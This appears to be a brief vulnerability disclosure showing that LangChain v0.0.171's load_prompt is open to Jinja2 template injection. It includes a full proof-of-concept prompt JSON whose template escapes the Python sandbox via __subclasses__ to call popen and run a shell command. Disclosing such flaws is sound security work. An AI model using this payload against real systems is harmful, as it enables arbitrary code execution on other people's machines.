Version: v0.0.171
LangChain can load prompt from a json file.
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
load_prompt
uses Jinja2 to concat prompts. Template Injection will triggered when load the json file if it contains malicious payload.
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
This vulnerability can execute arbitrary code